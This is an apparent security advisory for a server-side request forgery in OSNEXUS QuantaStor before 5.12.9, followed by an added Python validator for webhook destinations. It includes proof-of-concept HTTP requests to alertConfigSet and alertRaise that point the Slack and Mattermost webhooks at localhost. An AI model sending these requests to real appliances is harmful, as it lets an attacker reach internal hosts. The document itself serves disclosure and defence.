Advisory

Upgrade to the latest version of OSNEXUS QuantaStor (the issue is fixed in 5.12.9).

Technical details

An issue was discovered in OSNEXUS QuantaStor before 5.12.9. An authenticated admin can store an alert configuration whose webhook URLs (slackWebhookUrl, mattermostWebhookUrl) point at an arbitrary host. When an alert is subsequently raised, the appliance sends requests to those URLs, which yields a server-side request forgery (SSRF); only POST requests can be issued this way.

Preparing the SSRF (storing the webhook URLs via alertConfigSet):

GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=localhost&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://localhost&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://localhost HTTP/1.1
Host: 192.168.1.154
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic ddddddd
Content-Type: application/json
Content-Length: 0

Executing the SSRF (raising an alert via alertRaise):

GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1
Host: 192.168.1.154
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Connection: close
authorization: Basic dddddd
Content-Type: application/json
Content-Length: 1
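Added example, not part of the advisory and not QuantaStor's code: the destination policy an endpoint like alertConfigSet should apply to its webhook URL parameters before storing them, run here against the advisory's own query string. It assumes HTTPS-only webhooks and an operator-maintained allowlist of webhook hostnames (hooks.slack.com is used as a sample entry).

```python
# Added example, not OSNEXUS code: the destination policy an endpoint such as
# alertConfigSet should apply to slackWebhookUrl / mattermostWebhookUrl before
# storing them, so that a later alertRaise cannot be turned into a POST to the
# appliance itself or to hosts on its management network.
import ipaddress
from typing import Optional
from urllib.parse import parse_qs, urlsplit

WEBHOOK_PARAMS = ("slackWebhookUrl", "mattermostWebhookUrl")
LOOPBACK_NAMES = {"localhost", "localhost.localdomain"}

def webhook_url_problem(url: str, allowed_hosts: set) -> Optional[str]:
    """Return why `url` must be rejected, or None if it may be stored."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "https":            # assumption: webhooks are HTTPS only
        return f"scheme {parts.scheme!r} not allowed"
    if parts.username or parts.password:
        return "credentials embedded in URL"
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return "missing host"
    if host in LOOPBACK_NAMES:
        return "loopback hostname"
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: only operator-approved webhook hosts pass (assumption).
        # The sender must still re-check the resolved address at send time,
        # otherwise DNS rebinding turns an approved name into an internal IP.
        return None if host in allowed_hosts else "host not on webhook allowlist"
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped                         # treat ::ffff:127.0.0.1 as 127.0.0.1
    if not ip.is_global:                            # loopback, RFC 1918, link-local, 0.0.0.0 ...
        return f"{ip} is not a public address"
    return None

def rejected_webhooks(query: str, allowed_hosts: set) -> list:
    """Names of webhook parameters in an alertConfigSet query that fail the policy."""
    params = parse_qs(query, keep_blank_values=True)
    return sorted(
        name for name in WEBHOOK_PARAMS
        for value in params.get(name, [])
        if webhook_url_problem(value, allowed_hosts) is not None
    )

# Abridged query string from the advisory's alertConfigSet request (both webhooks -> localhost).
ADVISORY_QUERY = ("senderEmailAddress=a&smtpServerIpAddress=localhost&smtpServerPort=25"
                  "&slackWebhookUrl=http://localhost&mattermostWebhookUrl=http://localhost")

if __name__ == "__main__":
    print(rejected_webhooks(ADVISORY_QUERY, {"hooks.slack.com"}))
```

The same check belongs on smtpServerIpAddress and any other outbound destination the alert path uses, since those fields accept a host as well.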